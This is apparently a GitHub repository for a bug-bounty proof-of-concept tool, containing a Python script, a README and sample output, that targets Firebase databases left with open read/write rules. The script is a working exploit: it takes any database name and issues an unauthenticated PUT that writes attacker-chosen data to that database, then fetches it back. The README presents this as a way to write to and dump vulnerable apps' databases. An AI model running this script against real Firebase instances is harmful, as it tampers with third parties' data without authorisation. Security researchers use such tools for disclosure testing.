├── Firebase_Exploit.py
├── README.md
├── Write-Exploit.png
└── file.json


/Firebase_Exploit.py:
--------------------------------------------------------------------------------
 1 | # Author:
 2 | '''
 3 | Muhammad Khizer Javed
 4 | Cyber Security Researcher & Bug Bounty Hunter
 5 | whoami.securitybreached.org
 6 | Updated: 06-05-2024
 7 | '''
 8 | import requests
 9 | 
10 | print ("""
11 | <============================================================================================================>
12 | ||                               \"Firebase Database Permissions Exploit                                     ||
13 | ||  Usage   : Provide target DB name, filename to be created, information to write                          ||
14 | ||  Blog    : Read Full Blog about                                                                          ||
15 | ||  Url     : https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty  ||
16 | ||  Info    : This is a simple Python Exploit to Write Data to Insecure/vulnerable firebase databases!      ||
17 | ||            Commonly found inside Mobile Apps.                                                            ||
18 | ||            If the owner of the app has set the security rules as true for both "read" & "write"          ||
19 | ||            an attacker can probably dump the database and write their own data to the firebase database. ||
20 | <============================================================================================================>
21 | """)
22 | 
23 | line = "<<======================================================================>>"
24 | 
25 | # Give Data
26 | print ("[>] Input Data for exploit\n")
27 | site = input("[+] Enter firebase Database Name : ")
28 | file = input("[+] Enter filename    : ")
29 | name = input("[+] Enter name        : ")
30 | email= input("[+] Enter email       : ")
31 | website = input("[+] Enter Website     : ")
32 | message = input("[+] Enter A Message   : ")
33 | 
34 | # Payload
35 | site_url = f"https://{site}.firebaseio.com/{file}.json"
36 | data = {
37 |     "Exploit": "Successful",
38 |     "website": website,
39 |     "email": email,
40 |     "name": name,
41 |     "message": message
42 | }
43 | 
44 | try:
45 |     response = requests.put(site_url, json=data)
46 | except requests.exceptions.RequestException as e:
47 |     print(f"[x] Error: {e}")
48 |     exit(1)
49 | 
50 | # Collecting file
51 | print (line)
52 | if response.status_code == 200:
53 |     print ("[*] Exploited\n")
54 |     print (f"File Created: {site_url}\n")
55 | else:
56 |     print ("[*] Not Exploited\n")
57 |     print ("No File Created")
58 | 
59 | print (line)
60 | print ("""If you get a response 'Permission Denied' with 'Successfully
61 | Exploited' This shows the exploit is written but can't be read.
62 | Verify by visiting the URL""")
63 | print (" ")
64 | 
65 | # Fetch and print the response
66 | print("[>] Response\n")
67 | try:
68 |     r = requests.get(site_url)
69 |     print (r.text)
70 | except requests.exceptions.RequestException as e:
71 |     print(f"[x] Error: {e}")
72 | 
73 | print (line)
74 | 
75 | # Reasoning
76 | if response.status_code == 200:
77 |     print ("[>>] Successfully Exploited")
78 | elif response.status_code == 401:
79 |     print ("[x] Not Exploitable \n[!] Reason: All Permissions Denied")
80 | elif response.status_code == 404:
81 |     print ("[x] Database Not Found \n[!] Reason: Firebase Database Not Found")
82 | else:
83 |     print (f"[x] Unknown Error \n[!] Reason: {response.status_code}\n")
84 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure-Firebase-Exploit
 2 | A simple Python Exploit to Write Data to Insecure/vulnerable firebase databases! Commonly found inside Mobile Apps. If the owner of the app have set the security rules as true for both "read" &amp; "write" an attacker can probably dump database and write his own data to firebase db.
 3 | 
 4 | # Blog: 
 5 | 
 6 | https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
 7 | 
 8 | # Usage: 
 9 | 
10 | `Firebase-Write-Permission-Exploit.py` This is the Updated Version of Exploit i made. 
11 | Now simply give the Database Name, File Name You wish to create, Your Information. 
12 | And Write it to the Insecure/vulnerable firebase databases.
13 | 
14 | ![Usage POC Image](/Write-Exploit.png)
15 | 
16 | **python Firebase-Write-Permission-Exploit.py**
17 | 
18 | ```
19 | Enter Firebase Databse Name: <Database Name Here>
20 | Enter Your Filename: <File Name Here>
21 | Enter your name: <Your Name Here>
22 | Enter your email: <Your Email Here>
23 | Enter your Blog: <Your Contact link Here>
24 | Enter A Message: <A Message you want to display alongside the basic Exploit info>
25 | ```
26 | 
27 | 


--------------------------------------------------------------------------------
/Write-Exploit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit/3cd3d2639dd8070b16a81c14690766f517381bf7/Write-Exploit.png


--------------------------------------------------------------------------------
/file.json:
--------------------------------------------------------------------------------
1 | {"success":"true"}
2 | 


--------------------------------------------------------------------------------